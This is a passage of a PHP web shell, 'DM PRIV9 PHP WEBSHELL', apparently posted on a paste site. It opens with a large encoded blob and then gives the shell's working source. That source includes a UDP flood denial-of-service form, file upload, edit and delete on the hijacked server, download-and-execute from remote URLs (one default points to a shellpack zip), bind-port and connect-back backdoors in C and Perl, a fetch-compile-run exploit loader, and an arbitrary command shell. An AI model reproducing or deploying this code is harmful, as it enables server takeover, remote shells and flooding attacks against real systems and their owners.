ZdJELcbiXdo9LcaSXbTShgWpMfB5jfolvdJnSd2fpdJILfbYlFJXLFoyzFZl7tJOjwe0IWo15F3ySb2YvdM5lC3WPk2xvC2ySDo9zftFSkuazcbwSkuniF3HpKXppcJILCZl7tM15F3ySb2YSd3YlhtOjhTShFMa0fbkVwuOZfBA7tm1lduYlGXpZcbO1FM4IcMySF2A7tm0hgWpMfB5jfolvdJnmcbOgcoy0CUILfbkShbShkoyZwe0ICbkZCbLPkzrVfui0kZXmHJ50GuWmRtFzRmO4ftFSkzWVfui0kZXmYU50GuWmRtF2RmO4ftFSkzFVfui0kZXmKt50GuWmRtF5RmO4ftFSkzEVfui0kZL7tJOzFMHINUnMDBxlb2flfy9jd250cB50FZILfbkShTShkocpdoazwe0IcbiXdo9LcUImNorIDuklcj0JkZXLF3kjhTShkoOiforINUniFmkiGUIpKXpMd3klCBYPhtOMDBxlFZniFZELDBW9NJOMDBxlhbShDBCPkolLwe09weEpGXpjd250DB51cTShgWPLcMlScUE9woa4FoxvcoAPkZw+kZXLcMlScUL7tJOMDBxlwe0IfukpdUILcMlScaSXbUL7tMlMhtylFMamDUImRmO4ftFSkocpdoAphbShC29VfolVfBA7tm0hkuYZCZE9wocpdoagc2a0b2YvdmOldmOzhtwLfbkSRZOMDBxlwJL7tMlMhtrLF3kjhbShC29VfolVfBA7tm0hkuazcbwINUnzfukgFMaXdoyjcUILCbwSkZFSkocpdoApKXPLfbYlFJE9wuY0Fl9ZcbnSCBYlhtOiFJXmkZXLfbYlFJ4mRmO4ftFpKXPLfbYlFJE9wuY0Fl9ZcbnSCBYlhtOiFJXmkZXLfbYlFJ4mRmO4ftFpKXPLfbYlFJE9wuOZDB0PF3OZb3klFoxiC2APkZ50GuWmRtFmRtO1F2aZhUL7tMlMhoaZcBfphtkbd3kLAuklF3HJRtOzFMHphbShkuniF3HINUnlGtIJcoaMDB5lhtfrWl9WWaYTa09UOtFSwtFJRtwmhTSJRtOzFMHpKXPLcoy0Casfwe0ICbkZCbLPkuazcbwSkuniF3HpKXp9cBxzcbShkuOvD2aVFZE9wuOvD2aVb2flfy9idoXPkuYZCZL7tMcvFMaiC2IPkuOvD2aVFZniFZELfo9qcB4pGXppcJIikuOvD2aVBzyfhbShC29VfolVfBA7tm0hkuOvD2aVdMyscUE9wuOvD2aVb25idBAPkuOvD2aVBznfhTShDBCPkuOvD2aVdMyscUEiNUEmay9BWakkWAkHOUFpGXpjd250DB51cTShgWPLfMyZwe0IkuOvD2aVBzyfKXppcJilFMamDUImFoyzFZFSkuciFJLpGXPLcJE9wuY0Fl9ZcbnSCBYlhtFIkZXmkZxlGtILfMyZRtF7kZXLF3kjhUL7tJOiwe0IfukpdUilGtIJNUFJRtwmwJXLcJLpKXPLCJE9wuOZDB0PcbIPkZwmRtFJkZXLcJLpKXppcJILCUEiNUEmkZl7tJOXCbYzwe0Ikor7tm1lduYlDBCPkowIwT0IkZFpGXPLFoyzFZE9wtOJKXp9tMlMhtOXCbYzwe09wtFmhbShC29VfolVfBA7tm0hkoOifoydbUE9woyZFMy5htO1F2aZRtOXCbYzhTShgWp9tm0hgWpZcbO1FM4IkoOifor7tm0hKX==alVnRPIq
  6259.  
  6260.  
  6261. <?php }
  6262. # x=dos
  6263. elseif(isset($_GET['x']) && ($_GET['x'] == 'dos')){
  6264. ?>
  6265. <form action="?dm=<?php echo $pwd; ?>&amp;x=dos" method="post">
  6266.  
  6267. <?php
  6268. if(isset($_GET['host'])&&isset($_GET['time'])){
  6269. $packets = 0;
  6270. ignore_user_abort(TRUE);
  6271. set_time_limit(0);
  6272. $exec_time = $_GET['time'];
  6273. $time = time();
  6274. print "Started: ".time('d-m-y h:i:s')."<br>";
  6275. $max_time = $time+$exec_time;
  6276. $host = $_GET['host'];
  6277. for($i=0;$i<65000;$i++){
  6278. $out .= 'X';
  6279. }
  6280. while(1){
  6281. $packets++;
  6282. if(time() > $max_time){ break; }
  6283. $rand = rand(1,65000);
  6284. $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
  6285. if($fp){
  6286. fwrite($fp, $out);
  6287. fclose($fp);
  6288. }
  6289. }
  6290. echo "<br><b>UDP Flood</b><br>
  6291. Completed with $packets (" .round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
  6292.  
  6293. echo '<br><br><form action="'.$surl.'" method=GET><input type="hidden" name="act" value="phptools">
  6294. Host: <br><input type=text name=host><br>
  6295. Length (seconds): <br><input type=text name=time><br>
  6296. <input type=submit value=Go></form>';
  6297. } else {
  6298. echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
  6299. <table class="tabnet" style="width:300px;">
  6300. <tr><th colspan="2">UDP Flood</th></tr>
  6301. <tr><td>&nbsp;&nbsp;Host</td>
  6302. <td><input style="width:220px;" class="inputz" type=text name=host value=></td></tr>
  6303. <tr><td>&nbsp;&nbsp;Length (seconds)</td>
  6304. <td><input style="width:220px;" class="inputz" type=text name=time value=></td></tr>
  6305. <tr><td colspan=2 align=center><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td></tr>
  6306. </table></center>';
  6307. }
  6308. }
  6309.  
  6310.  
  6311. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
  6312. @ob_start();
  6313. @eval("phpinfo();");
  6314. $buff = @ob_get_contents();
  6315. @ob_end_clean();
  6316. $awal = strpos($buff,"<body>")+6;
  6317. $akhir = strpos($buff,"</body>");
  6318. echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  6319. }
  6320.  
  6321. elseif(isset($_GET['view']) && ($_GET['view'] != "")){
  6322. if(is_file($_GET['view'])){
  6323.  
  6324. if(!isset($file))
  6325. $file = magicboom($_GET['view']);
  6326.  
  6327. if(!$win && $posix){
  6328. $name=@posix_getpwuid(@fileowner($file));
  6329. $group=@posix_getgrgid(@filegroup($file));
  6330. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  6331. } else {
  6332. $owner = $user;
  6333. }
  6334. $filn = basename($file);
  6335. echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  6336. <tr><td>Filename</td>
  6337. <td><nobr><span id=\"".clearspace($filn)."_link\">".$file."</span>
  6338. <form action=\"?dm=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  6339. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  6340. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  6341. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  6342. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  6343. onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  6344. </form></nobr></td></tr>
  6345.  
  6346. <tr><td>Size</td>
  6347. <td>".ukuran($file)."</td></tr>
  6348. <tr><td>Permission</td>
  6349. <td>".get_perms($file)."</td></tr>
  6350. <tr><td>Owner</td>
  6351. <td>".$owner."</td></tr>
  6352. <tr><td>Create time</td>
  6353. <td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  6354. <tr><td>Last modified</td>
  6355. <td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  6356. <tr><td>Last accessed</td>
  6357. <td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  6358. <tr><td>Actions</td>
  6359. <td><a href=\"?dm=$pwd&amp;edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?dm=$pwd&amp;delete=$file\">Delete</a> | <a href=\"?dm=$pwd&amp;dl=$file\">Download</a>&nbsp;(<a href=\"?dm=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
  6360.  
  6361. <tr><td>View</td><td><a href=\"?dm=".$pwd."&amp;view=".$file."&amp;type=code\">Highlight Code</a>
  6362. |
  6363. <a href=\"?dm=".$pwd."&amp;view=".$file."\">Text</a>
  6364. |
  6365. <a href=\"?dm=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> ";
  6366.  
  6367. if(isset($_GET['type']) && ($_GET['type']=='image')){
  6368.  
  6369. echo "<div style=\"text-align:center;margin:8px;\">
  6370. <img src=\"?dm=".$pwd."&amp;img=".$filn."\"></div>";
  6371. }
  6372.  
  6373. elseif(isset($_GET['type']) && ($_GET['type']=='code')){
  6374. echo "<div class=\"viewfile\">";
  6375. echo nl2br(htmlentities((@file_get_contents($file))));
  6376. echo "</div>";
  6377.  
  6378. } else {
  6379. echo "<div class=\"viewfile\">";
  6380. $file = wordwrap(@file_get_contents($file),"240","\n");
  6381. @highlight_string($file);
  6382. echo "</div>";
  6383.  
  6384. }
  6385. }
  6386. elseif(is_dir($_GET['view'])) {
  6387. echo showdir($pwd,$prompt);
  6388. }
  6389. }
  6390. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")) {
  6391. if(isset($_POST['save'])) {
  6392. $file = $_POST['saveas'];
  6393. $content = magicboom($_POST['content']);
  6394. if($filez = @fopen($file,"w")) {
  6395. $time = date("d-M-Y H:i",time());
  6396. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save";
  6397. @fclose($filez);
  6398. } else $msg = "permission denied";
  6399. } if
  6400. (!isset($file)) $file = $_GET['edit'];
  6401. if($filez = @fopen($file,"r")) {
  6402. $content = ""; while(!feof($filez)) {
  6403. $content .= htmlentities(str_replace("''","'",fgets($filez)));
  6404. }
  6405. @fclose($filez);
  6406. }
  6407. ?>
  6408.  
  6409. <form action="?dm=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  6410. <table class="cmdbox">
  6411. <tr><td colspan="2">
  6412. <textarea class="output" name="content"><?php echo $content; ?></textarea></td>
  6413. <tr>
  6414. <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  6415. <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr></table> </form>
  6416.  
  6417. <?php }
  6418. # x=upload
  6419. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
  6420. if(isset($_POST['uploadcomp'])){
  6421. if(is_uploaded_file($_FILES['file']['tmp_name'])){
  6422. $path = magicboom($_POST['path']);
  6423. $fname = $_FILES['file']['name'];
  6424. $tmp_name = $_FILES['file']['tmp_name'];
  6425. $pindah = $path.$fname;
  6426. $stat = @move_uploaded_file($tmp_name,$pindah);
  6427. if($stat) {
  6428. $msg = "<br><nobr><span class='b11'>File Uploaded To $pindah ";
  6429. }
  6430. else $msg = "<br>Failed To Upload $fname";
  6431. }
  6432. else $msg = "<br>Failed To Upload $fname </span></nobr>";
  6433. }
  6434.  
  6435. elseif(isset($_POST['uploadurl'])){
  6436. $pilihan = trim($_POST['pilihan']);
  6437. $wurl = trim($_POST['wurl']);
  6438. $path = magicboom($_POST['path']);
  6439. $namafile = download($pilihan,$wurl);
  6440. $pindah = $path.$namafile;
  6441. if(is_file($pindah)) {
  6442. $msg = "<br><nobr><span class='b11'>File Uploaded To $pindah";
  6443. }
  6444. else
  6445. $msg = "<br>Failed Upload $namafile </span></nobr>";
  6446. }
  6447. ?>
  6448.  
  6449. <form action="?dm=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  6450. <br><br><table class="tabnet" style="width:320px;padding:0 1px;">
  6451. <tr><th colspan="2"><b> <span class='b12'> _UPLOAD FILE_</span></b></th></tr>
  6452. <tr><td colspan="2"><nobr><p style="text-align:center;"><input style="color:red" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:100px;"></p></nobr></td></tr>
  6453. <tr><td colspan="2">
  6454. <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  6455. </table>
  6456. </form>
  6457. <table class="tabnet" style="width:320px;padding:0 1px;">
  6458. <tr><th colspan="2"><b><span class='b12'> _UPLOAD FROM URL_</span></b></th></tr>
  6459. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?dm=<?php echo $pwd; ?>&amp;x=upload">
  6460. <table>
  6461. <tr>
  6462. <td>URL : </td>
  6463. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://dm-zone.us/shellpack.zip"></td></tr>
  6464. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  6465. <tr><td>
  6466. <select size="1" class="inputz" name="pilihan">
  6467. <option value="wwget">wget</option>
  6468. <option value="wlynx">lynx</option>
  6469. <option value="wfread">fread</option>
  6470. <option value="wfetch">fetch</option>
  6471. <option value="wlinks">links</option>
  6472. <option value="wget">GET</option>
  6473. <option value="wcurl">curl</option>
  6474. </select></td>
  6475. <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td></tr>
  6476. </table></form></td> </tr></table>
  6477. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  6478.  
  6479. <?php }
  6480. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
  6481. if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
  6482.  
  6483. $port = trim($_POST['port']);
  6484. $passwrd = trim($_POST['bind_pass']);
  6485. tulis("bdc.c",$port_bind_bd_c);
  6486. exe("gcc -o bdc bdc.c");
  6487. exe("chmod 777 bdc");
  6488. @unlink("bdc.c");
  6489. exe("./bdc ".$port." ".$passwrd." &");
  6490. $scan = exe("ps aux");
  6491. if(eregi("./bdc $por",$scan)){
  6492. $msg = "<p>Process found running, backdoor setup successfully.</p>";
  6493. }
  6494. else {
  6495. $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
  6496. }
  6497. }
  6498.  
  6499. elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
  6500. $port = trim($_POST['port']);
  6501. $passwrd = trim($_POST['bind_pass']);
  6502. tulis("bdp",$port_bind_bd_pl);
  6503. exe("chmod 777 bdp");
  6504. $p2=which("perl");
  6505. exe($p2." bdp ".$port." &");
  6506. $scan = exe("ps aux");
  6507. if(eregi("$p2 bdp $port",$scan)){
  6508. $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  6509. else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
  6510. }
  6511. }
  6512.  
  6513. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
  6514. $ip = trim($_POST['ip']);
  6515. $port = trim($_POST['backport']);
  6516. tulis("bcc.c",$back_connect_c);
  6517. exe("gcc -o bcc bcc.c");
  6518. exe("chmod 777 bcc");
  6519. @unlink("bcc.c");
  6520. exe("./bcc ".$ip." ".$port." &");
  6521. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  6522. }
  6523.  
  6524. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
  6525. $ip = trim($_POST['ip']);
  6526. $port = trim($_POST['backport']);
  6527. tulis_2("bcp",$back_connect);
  6528. exe("chmod +x bcp");
  6529. $p2=which("perl");
  6530. exe($p2." bcp ".$ip." ".$port." &");
  6531. sleep(1);
  6532. $msg = "Now script try connect to ".$ip." port ".$port." ...";
  6533. unlink("bcp");
  6534. }
  6535.  
  6536. elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
  6537. $pilihan = trim($_POST['pilihan']);
  6538. $wurl = trim($_POST['wurl']);
  6539. $namafile = download($pilihan,$wurl);
  6540. if(is_file($namafile)) { $msg = exe($wcmd); }
  6541. else $msg = "error: file not found $namafile";
  6542. }
  6543. ?>
  6544.  
  6545. <table class="tabnet"><tr>
  6546. <th>Port Binding</th>
  6547. <th>Connect Back</th>
  6548. <th>Load and Exploit</th></tr>
  6549.  
  6550. <tr><td>
  6551. <form method="post" actions="?dm=<?php echo $pwd; ?>&amp;x=netsploit">
  6552.  
  6553. <table><tr><td>Port</td>
  6554. <td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
  6555.  
  6556. <tr><td>Password</td>
  6557. <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
  6558.  
  6559. <tr><td>Use</td>
  6560. <td style="text-align:justify">
  6561. <p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select><input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px"></td></tr></table>
  6562. </form></td>
  6563.  
  6564. <td> <form method="post" actions="?dm=<?php echo $pwd; ?>&amp;x=netsploit">
  6565. <table><tr><td>IP</td>
  6566. <td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
  6567. </td>
  6568. </tr>
  6569. <tr><td>Port</td>
  6570. <td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
  6571.  
  6572. <tr><td>Use</td>
  6573. <td style="text-align:justify">
  6574. <p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px"></td></tr></table> </form> </td>
  6575.  
  6576. <td> <form method="post" actions="?dm=<?php echo $pwd; ?>&amp;x=netsploit">
  6577. <table> <tr><td>url</td>
  6578. <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
  6579. <tr><td>cmd</td>
  6580. <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr>
  6581. <tr><td><select size="1" class="inputz" name="pilihan">
  6582. <option value="wwget">wget</option>
  6583. <option value="wlynx">lynx</option>
  6584. <option value="wfread">fread</option>
  6585. <option value="wfetch">fetch</option>
  6586. <option value="wlinks">links</option> <option value="wget">GET</option>
  6587. <option value="wcurl">curl</option>
  6588. </select></td>
  6589. <td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;"></td></tr></table></form </td></tr></table>
  6590. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  6591.  
  6592.  
  6593. <?php }
  6594. elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')) {
  6595. ?>
  6596. <form action="?dm=<?php echo $pwd; ?>&amp;x=shell"method="post">
  6597.  
  6598. <table class="cmdbox"> <tr>
  6599. <td colspan="2">
  6600. <textarea class="output"> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea> </td></tr>
  6601.  
  6602. <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
  6603. </table></form>
  6604.  
  6605. <?php
  6606. } else {
  6607. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
  6608. $file = $_GET['delete']; @unlink($file);
  6609. }
  6610.  
  6611. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
  6612. delete_option($_GET['fdelete']);
  6613. }
  6614.  
  6615. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
  6616. $path = $pwd.$_GET['mkdir']; @mkdir($path);
  6617. }
  6618. $buff = showdir($pwd,$prompt);
  6619. echo $buff;
  6620. }
  6621. ?>
  6622.  
  6623.  
  6624. <!-- DM-5HELL FOOTER -->
  6625. <div align="center">
  6626. <br>
  6627. <!-- DM-5HELL -->
  6628. <br>
  6629. <table class="tabnet" style="width:700px;padding:0 1px;">
  6630. <tr><td align="center" colspan="2">
  6631. <nobr><span class='b12'>WE DO IT WE WANT BECAUSE WE CAN</span>
  6632. </td></tr>
  6633. <tr><td align="center" colspan="2">
  6634. <nobr><span class='b12'>DM PRIV9 PHP WEBSHELL &copy; 2013 </span>
  6635. </td></tr>
  6636. </table><br><br>
  6637. </html><!-- DM-5HELL -->
  6638. </div></div></body></html>
  6639. <!-- END OF DM-5HELL -->
Add Comment
Please, Sign In to add comment